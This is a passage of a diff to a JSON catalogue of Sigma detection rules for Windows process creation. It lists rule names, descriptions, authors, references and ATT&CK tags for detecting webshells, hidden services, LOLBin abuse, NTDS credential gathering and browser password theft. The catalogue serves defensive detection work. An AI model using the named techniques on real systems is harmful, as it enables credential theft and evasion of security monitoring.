execute from other folder the original path", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extexport.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", - "value": "User Discovery And Export Via Get-ADUser Cmdlet" - }, - { - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "meta": { - "author": "Teymur Kheirkhabarov", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "value": "Possible Privilege Escalation via Weak Service Permissions" - }, - { - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "meta": { - "author": 
"Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/20", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "value": "Abuse of Service Permissions to Hide Services in Tools" - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "filename": "proc_creation_win_using_set_service_to_hide_services.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service" - }, - { - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_verclsid_runs_com.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", - "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218" ] }, - "uuid": 
"d06be4b9-8045-428b-a567-740a26d9db25", - "value": "Verclsid.exe Runs COM Object" + "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "value": "Suspicious Extexport Execution" }, { - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "meta": { - "author": "behops, Bhabesh Raj", - "creation_date": "2021/10/08", + "author": "frack113", + "creation_date": "2022/01/16", "falsepositive": [ - "Legitimate use by administrator" + "Legitimate script" ], - "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" - ] - }, - "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", - "value": "VMToolsd Suspicious Child Process" - }, - { - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "filename": "proc_creation_win_msiexec_install_quiet.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914244344799235", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.t1218.007" ] }, - "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", - "value": "Java Running with Remote Debugging" + "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "value": "Suspicious Msiexec Quiet Install" }, { - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", "meta": { - "author": "frack113", - "creation_date": "2022/09/25", + "author": "elhoim, CD_ROM_", + "creation_date": "2022/04/27", "falsepositive": [ - "Legitimate use" + "Unknown" ], - "filename": "proc_creation_win_w32tm.yml", + "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + "https://redcanary.com/blog/intelligence-insights-november-2021/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "value": "RunDLL32 Spawning Explorer" + }, + { + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_whoami.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" ], "tags": [ "attack.discovery", - "attack.t1124" + "attack.t1033", + "car.2016-03-001" ] }, - "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", - "value": "Use of W32tm as Timer" + "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "value": "Renamed Whoami Execution" }, { - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (update)", + "creation_date": "2022/12/23", "falsepositive": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "filename": "proc_creation_win_aadinternals_cmdlets_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + "https://github.com/Gerenios/AADInternals", + "https://o365blog.com/aadinternals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml" ], "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ] }, - "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", - "value": "Wab Execution From Non Default Location" + "uuid": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "value": "AADInternals PowerShell Cmdlets Execution - ProccessCreation" }, { - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_wab_unusual_parents.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", - "value": "Wab/Wabmig Unusual Parent Or Child Processes" - }, - { - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/14", - "falsepositive": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" - ], - "filename": "proc_creation_win_weak_or_abused_passwords.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", - "value": "Weak or Abused Passwords In CLI" - }, - { - "description": 
"Detect use of WebBrowserPassView.exe", + "description": "Detect use of X509Enrollment", "meta": { "author": "frack113", - "creation_date": "2022/08/20", + "creation_date": "2022/12/23", "falsepositive": [ - "Legitimate use" + "Legitimate administrative script" ], - "filename": "proc_creation_win_webbrowserpassview.yml", + "filename": "proc_creation_win_x509enrollment.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], - "tags": [ - "attack.credential_access", - "attack.t1555.003" - ] + "tags": "No established tags" }, - "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", - "value": "Launch WebBrowserPassView Executable" + "uuid": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "value": "Suspicious X509Enrollment - Process Creation" }, { - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", "meta": { - "author": "Florian Roth (rule), MSTI (query)", - "creation_date": "2022/10/01", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "creation_date": "2021/07/11", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_webshell_chopper.yml", + "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ] }, - "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "value": "Chopper Webshell Process Pattern" + "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "value": "Suspicious Spool Service Child Process" }, { - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", - "creation_date": "2017/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_webshell_detection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ] - }, - "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", - "value": "Webshell Detection With Command Line Keywords" - }, - { - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/17", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_webshell_hacking.yml", + "filename": "proc_creation_win_rundll32_unc_path.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://youtu.be/7aemGhaE9ds?t=641", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" + "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ] }, - "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "value": "Webshell Hacking Activity Patterns" + "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "value": "Rundll32 UNC Path Execution" }, { - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) 
that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", "meta": { - "author": "Cian Heasley, Florian Roth", - "creation_date": "2020/07/22", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "creation_date": "2019/09/12", "falsepositive": [ - "Unknown" + "Legitimate programs executing PowerShell scripts" ], - "filename": "proc_creation_win_webshell_recon_detection.yml", - "level": "high", + "filename": "proc_creation_win_non_interactive_powershell.yml", + "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", - "value": "Webshell Recon Detection Via CommandLine & Processes" - }, - { - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "meta": { - "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Particular web applications may spawn a shell process legitimately" - ], - "filename": "proc_creation_win_webshell_spawn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ] - }, - "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", - "value": "Shells Spawned by Web Servers" - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", - "meta": { - "author": "James Pemberton / @4A616D6573", - "creation_date": "2019/10/24", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." - ], - "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, - "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "value": "Usage Of Web Request Commands And Cmdlets" + "uuid": "f4bbd493-b796-416e-bbf2-121235348529", + "value": "Non Interactive PowerShell" }, { - "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "description": "Detects execution of renamed paexec via imphash and executable product string", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", + "author": "Jason Lynch", + "creation_date": "2019/04/17", "falsepositive": [ - "Legitmate usage of the utility by 
administrators to query the event log" + "Unknown imphashes" ], - "filename": "proc_creation_win_wevtutil_recon.yml", + "filename": "proc_creation_win_renamed_paexec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1036.003", + "attack.g0046", + "car.2013-05-009", + "attack.execution", + "attack.t1569.002" ] }, - "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "value": "Wevtutil Recon" + "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b", + "value": "Execution of Renamed PaExec" }, { - "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "meta": { + "author": "sam0x90", + "creation_date": "2021/08/06", + "falsepositive": [ + "To be determined" + ], + "filename": "proc_creation_win_susp_esentutl_params.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0404/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" + ] + }, + "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "value": "Esentutl Gather Credentials" + }, + { + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", "meta": { "author": "Florian Roth", - "creation_date": "2022/01/28", + "creation_date": "2020/01/28", "falsepositive": [ - "Unknown" + "Unknown yet" ], - "filename": "proc_creation_win_whoami_as_priv_user.yml", + "filename": "proc_creation_win_susp_renamed_dctask64.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://nsudo.m2team.org/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], 
"tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ] }, - "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "value": "Run Whoami as Privileged User" + "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "value": "Renamed ZOHO Dctask64" }, { - "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", "meta": { - "author": "Teymur Kheirkhabarov, Florian Roth", - "creation_date": "2019/10/23", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", "falsepositive": [ - "Possible name overlap with NT AUHTORITY substring to cover all languages" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], - "filename": "proc_creation_win_whoami_as_system.yml", + "filename": "proc_creation_win_lolbin_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "value": "Use of Remote.exe" + }, + { + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/16", + "falsepositive": [ + "Legitimate use by an administrator" + ], + "filename": "proc_creation_win_lolbin_openconsole.yml", + "level": 
"medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537563834478645252", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", + "value": "Use of OpenConsole" + }, + { + "description": "Detects the execution GMER tool based on image and hash fields.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_gmer_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" + "http://www.gmer.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion" ] }, - "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", - "value": "Run Whoami as SYSTEM" + "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "value": "GMER - Rootkit Detector and Remover Execution" }, { - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. 
This is often used after a privilege escalation attempt.", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "meta": { "author": "Florian Roth", - "creation_date": "2021/05/05", + "creation_date": "2021/03/05", "falsepositive": [ - "Administrative activity (rare lookups on current privileges)" + "Unknown" ], - "filename": "proc_creation_win_whoami_priv.yml", + "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1055" ] }, - "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", - "value": "Run Whoami Showing Privileges" - }, - { - "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", - "meta": { - "author": "Olaf Hartong", - "creation_date": "2019/05/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_win10_sched_task_0day.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ] - }, - "uuid": 
